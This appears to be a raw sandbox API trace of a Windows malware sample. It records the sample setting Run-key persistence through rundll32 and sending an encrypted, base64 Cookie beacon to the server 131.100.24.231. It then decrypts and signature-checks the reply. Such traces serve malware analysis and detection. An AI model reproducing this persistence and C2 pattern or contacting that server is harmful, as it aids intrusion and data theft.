GetProcessHeap () returned 0x530000 [0341.112] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0341.112] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0341.112] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0341.114] GetProcessHeap () returned 0x530000 [0341.114] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c710 [0341.114] GetProcessHeap () returned 0x530000 [0341.114] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0341.114] GetProcessHeap () returned 0x530000 [0341.114] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0341.114] GetProcessHeap () returned 0x530000 [0341.115] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5bed18 | out: hHeap=0x530000) returned 1 [0341.115] GetProcessHeap () returned 0x530000 [0341.115] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0341.115] GetProcessHeap () returned 0x530000 [0341.115] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0341.115] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0341.115] GetProcessHeap () returned 0x530000 [0341.115] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a838e0 [0341.115] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WYJJKnx") returned 97 [0341.115] GetProcessHeap () returned 0x530000 [0341.116] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a838e0 | out: hHeap=0x530000) returned 1 [0341.116] GetProcessHeap () returned 0x530000 [0341.116] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0341.116] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x660, lpdwDisposition=0x0) returned 0x0 [0341.116] GetProcessHeap () returned 0x530000 [0341.116] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0341.116] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WYJJKnx") returned 97 [0341.116] RegSetValueExW (in: hKey=0x660, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WYJJKnx", cbData=0xc4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WYJJKnx") returned 0x0 [0341.117] RegCloseKey (hKey=0x660) returned 0x0 [0341.118] GetProcessHeap () returned 0x530000 [0341.118] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c710 | out: hHeap=0x530000) returned 1 [0341.118] GetProcessHeap () returned 0x530000 [0341.118] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0341.118] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xeafb7) returned 0x102 [0351.128] GetProcessHeap () returned 0x530000 [0351.128] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0351.128] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0351.128] GetProcessHeap () returned 0x530000 [0351.128] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0351.129] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0351.129] GetProcessHeap () returned 0x530000 [0351.129] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0351.129] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0351.129] GetProcessHeap () returned 0x530000 [0351.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0351.129] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a838e0 [0351.131] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0351.131] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0351.131] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0351.131] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0351.131] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0351.131] FindClose (in: hFindFile=0x2a838e0 | out: hFindFile=0x2a838e0) returned 1 [0351.131] GetProcessHeap () returned 0x530000 [0351.131] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0351.132] GetProcessHeap () returned 0x530000 [0351.132] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0351.132] GetProcessHeap () returned 0x530000 [0351.132] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0351.132] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0351.133] GetProcessHeap () returned 0x530000 [0351.133] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0351.133] GetProcessHeap () returned 0x530000 [0351.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0351.134] GetProcessHeap () returned 0x530000 [0351.134] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0351.134] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0351.134] GetProcessHeap () returned 0x530000 [0351.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0351.134] GetProcessHeap () returned 0x530000 [0351.134] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0351.134] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0351.134] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0351.134] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0351.134] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0351.134] GetProcessHeap () returned 0x530000 [0351.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0351.134] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0351.134] GetProcessHeap () returned 0x530000 [0351.135] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0351.135] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0351.135] GetProcessHeap () returned 0x530000 [0351.135] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0351.135] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0351.135] GetProcessHeap () returned 0x530000 [0351.135] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd1) returned 0x2996c80 [0351.135] GetProcessHeap () returned 0x530000 [0351.135] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0351.135] GetProcessHeap () returned 0x530000 [0351.136] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0351.136] CryptBinaryToStringW (in: pbBinary=0x2996c80, cbBinary=0xd1, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0351.136] GetProcessHeap () returned 0x530000 [0351.136] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x232) returned 0x2b65430 [0351.136] CryptBinaryToStringW (in: pbBinary=0x2996c80, cbBinary=0xd1, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThNicDrdkMra54eeOQDDegxz+9yG9jsu6bjfqcHhX7hWIOfANDeV1K+SasjhnnJjXZ4=", pcchString=0x2cf504) returned 1 [0351.136] GetProcessHeap () returned 0x530000 [0351.136] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0351.136] GetProcessHeap () returned 0x530000 [0351.136] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fe0 [0351.136] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: vpmbGEBYRCDm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThNicDrdkMra54eeOQDDegxz+9yG9jsu6bjfqcHhX7hWIOfANDeV1K+SasjhnnJjXZ4=\r\n") returned 303 [0351.136] GetProcessHeap () returned 0x530000 [0351.136] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fe0 | out: hHeap=0x530000) returned 1 [0351.136] GetProcessHeap () returned 0x530000 [0351.137] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0351.137] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0351.137] GetProcessHeap () returned 0x530000 [0351.137] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0351.137] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0351.138] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="rbSYzmWbHkrHWqqeRSGSjBKgtutkPBcboXUUeGsfTKBsLvroB", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0351.139] GetProcessHeap () returned 0x530000 [0351.139] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0351.139] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0351.139] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0351.139] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0351.139] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: vpmbGEBYRCDm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThNicDrdkMra54eeOQDDegxz+9yG9jsu6bjfqcHhX7hWIOfANDeV1K+SasjhnnJjXZ4=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0352.299] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0352.299] GetProcessHeap () returned 0x530000 [0352.299] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0352.300] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x429) returned 1 [0352.300] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48229, dwNumberOfBytesToRead=0xfbd7, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48229*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0352.300] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0352.300] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0352.300] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0352.300] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0352.300] GetProcessHeap () returned 0x530000 [0352.300] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0352.300] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0352.300] GetProcessHeap () returned 0x530000 [0352.301] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0352.301] GetProcessHeap () returned 0x530000 [0352.301] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0352.301] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0352.301] GetProcessHeap () returned 0x530000 [0352.302] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0352.302] GetProcessHeap () returned 0x530000 [0352.302] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0352.302] GetProcessHeap () returned 0x530000 [0352.302] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0352.302] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0352.302] GetProcessHeap () returned 0x530000 [0352.302] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0352.303] GetProcessHeap () returned 0x530000 [0352.303] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0352.303] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0352.303] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0352.303] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0352.303] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0352.303] GetProcessHeap () returned 0x530000 [0352.303] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0352.303] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0352.303] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0352.305] GetProcessHeap () returned 0x530000 [0352.305] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0352.305] GetProcessHeap () returned 0x530000 [0352.305] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0352.305] GetProcessHeap () returned 0x530000 [0352.306] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0352.306] GetProcessHeap () returned 0x530000 [0352.306] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996c80 | out: hHeap=0x530000) returned 1 [0352.306] GetProcessHeap () returned 0x530000 [0352.306] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0352.306] GetProcessHeap () returned 0x530000 [0352.306] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0352.307] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0352.307] GetProcessHeap () returned 0x530000 [0352.307] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ae0 [0352.307] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qoBP") returned 94 [0352.307] GetProcessHeap () returned 0x530000 [0352.307] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ae0 | out: hHeap=0x530000) returned 1 [0352.307] GetProcessHeap () returned 0x530000 [0352.307] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0352.307] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x660, lpdwDisposition=0x0) returned 0x0 [0352.308] GetProcessHeap () returned 0x530000 [0352.309] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0352.309] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qoBP") returned 94 [0352.309] RegSetValueExW (in: hKey=0x660, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qoBP", cbData=0xbe | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qoBP") returned 0x0 [0352.310] RegCloseKey (hKey=0x660) returned 0x0 [0352.310] GetProcessHeap () returned 0x530000 [0352.310] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0352.310] GetProcessHeap () returned 0x530000 [0352.311] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0352.312] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xea592) returned 0x102 [0362.314] GetProcessHeap () returned 0x530000 [0362.314] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0362.314] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0362.314] GetProcessHeap () returned 0x530000 [0362.314] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0362.314] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0362.314] GetProcessHeap () returned 0x530000 [0362.315] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0362.315] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0362.315] GetProcessHeap () returned 0x530000 [0362.315] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0362.315] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83ae0 [0362.319] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0362.319] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0362.319] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") 